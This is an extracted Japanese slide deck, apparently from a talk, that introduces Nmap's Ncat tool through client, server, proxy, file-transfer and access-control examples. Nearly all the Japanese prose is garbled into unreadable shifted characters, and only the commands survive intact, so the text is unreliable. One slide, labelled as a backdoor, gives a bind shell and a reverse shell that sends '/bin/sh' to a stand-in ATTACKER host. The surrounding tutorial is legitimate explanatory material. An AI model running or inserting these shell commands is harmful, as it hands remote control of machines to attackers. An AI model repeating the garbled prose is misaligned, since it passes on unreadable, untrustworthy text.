/DBUΛ͔͓ͭ͏ ௕Ԭ*5։ൃऀษڧձୈճษڧձ /FUDBU

ࣗݾ঺հ w )BZBUP*NBJࠓҪ൏ਓ w !IBZBKP w Πϯϑϥ୲౰

/FUDBU

/FUDBUͱ͸ w ODίϚϯυ w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ w ଟ໨తωοτϫʔΫϢʔςΟϦςΟ w 5$16%1ϓϩτίϧΛѻ͏ w DBUͷωοτϫʔΫ൛

͍Ζ͍Ζͳ/FUDBU OD ΦϦδφϧ w W w 6CVOUV (/6൛ w ΦϦδφϧޓ׵ w "SDI FYUSB 0QFO#4%൛ w *1Wɺ6%4ରԠ w ίϚϯυ࣮ߦඇରԠ w $FOU04 w 049 /NBQ൛ ʢ/DBUʣ w 44-ରԠɺଟػೳ w $FOU04 OD!ODBU CVTZCPY൛ w ΄΅(/6൛ͱಉ͡ w #VTZ#PY w "MQJOF ࠓճ͸/NBQ൛/FUDBUͰ͋Δ/DBU ODBU Λ঺հ͠·͢ɻ IUUQTONBQPSHODBU

/DBU ODBU ͷ͔͍͔ͭͨ

ΫϥΠΞϯτ $ ncat -C example.com 80 )551ΫϥΠΞϯτ $ ncat -C HOST 11211 .FNDBDIFΫϥΠΞϯτ "4$** $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 . "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\ > ncat HOST 11211 |\ > hexdump -C .FNDBDIFΫϥΠΞϯτ #*/"3:

αʔό SERVER$ ncat -l --broker HOST1$ ncat SERVER HOST2$ ncat SERVER $IBUαʔό CSPLFS SERVER$ ncat -l --chat HOST1$ ncat SERVER HOST2$ ncat SERVER $IBUαʔό DIBU $IBUαʔό SERVER$ ncat -l # σϑΥϧτϙʔτ31337 HOST1$ ncat SERVER

αʔό SERVER$ ncat -l 8080 -k \ > --sh-exec \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl http://SERVER:8080 8FCαʔό SERVER$ ncat --ssl -l 8443 -k \ > --sh-exec \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl -k https://SERVER:8443 8FCαʔό 44-

ϓϩΩγ PROXY$ ncat -l 8080 \ > --proxy-type http --proxy-auth user:pass CLIENT$ curl -v https://example.com \ > --proxy PROXY:8080 --proxy-user user:pass )551ϓϩΩγ PROXY$ ncat -l 1883 -k \ > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883' CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#" ϓϩτίϧม׵ )551)5514 PROXY$ ncat --ssl -l 8443 -k \ > --sh-exec 'ncat -i 3 -C localhost 3000' CLIENT$ curl -k https://PROXY:8443 44-Φϑϩʔυ

ϓϩΩγ PROXY$ mkfifo f PROXY$ ncat -l 8080 -k while true; do \ > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \ > done ίωΫγϣϯϓʔϦϯά $ httpstat https://example.com/ ... DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer [ 6ms | 96ms | 371ms | 96ms | 1ms ] | | | | | namelookup:6ms | | | | connect:102ms | | | pretransfer:473ms | | starttransfer:569ms | total:570ms $ httpstat http://PROXY:8080 -H 'Host: example.com' ... DNS Lookup TCP Connection Server Processing Content Transfer [ 5ms | 0ms | 98ms | 0ms ] | | | | namelookup:5ms | | | connect:5ms | | starttransfer:103ms | total:103ms

ϑΝΠϧసૹ SERVER$ ncat -l 8080 --recv-only >out.file CLIENT$ ncat --send-only SERVER 8080 out.file αʔόΫϥΠΞϯτసૹ SERVER$ ncat --ssl -l 8080 --recv-only >out.file CLIENT$ ncat --ssl --send-only SERVER 8080

TARGET$ ncat -l --exec /bin/sh 8080 ATTACKER$ ncat TARGET 8080 λʔήοτʹ௚઀ΞΫηεՄೳͳ৔߹ ATTACKER$ ncat -l 8080 TARGET$ ncat --exec /bin/sh ATTACKER 8080 λʔήοτ͕/"5എޙͷ৔߹ όοΫυΞ

ΞΫηε੍ޚ $ ncat -l 8080 --allow 10.0.0.2 ڐՄ $ ncat -l 8080 --deny 10.0.0.0/8 ڋ൱ ྆ํࢦఆͨ͠৔߹͸EFOZ͕༏ઌ͞Ε·͢ɻ

·ͱΊ

·ͱΊ w /FUDBUίϚϯυ͸͍͔ͭ͘ͷ࣮૷͕͋Δ w /DBU͸ଟػೳɺ։ൃ΋੝ΜͳͷͰ͓͢͢Ί w ΞΠσΞ࣍ୈͰ༷ʑͳ࢖͍ํ͕͋Δ